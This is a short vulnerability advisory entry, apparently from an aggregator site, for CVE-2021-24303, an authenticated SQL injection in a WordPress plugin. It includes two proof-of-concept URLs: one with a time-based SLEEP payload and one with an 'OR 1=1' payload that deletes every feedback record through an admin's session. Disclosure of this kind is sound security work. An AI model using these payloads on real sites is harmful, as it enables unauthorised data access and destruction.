Lucene search
HistoryJul 30, 2021 - 12:00 a.m.
JiangQie Official Website Mini Program < 1.1.1 - Authenticated SQL Injection
0.001 Low
EPSS
Percentile
50.2%
The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29
Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1Related
nvd
nvd
CVE-2021-24303
2021-09-06 11:15:07
patchstack
patchstack
cvelist
cvelist
cve
cve
CVE-2021-24303
2021-09-06 11:15:07
prion
prion
Sql injection
2021-09-06 11:15:00
wpvulndb
wpvulndb
JiangQie Official Website Mini Program < 1.1.1 - Authenticated SQL Injection
2021-07-30 00:00:00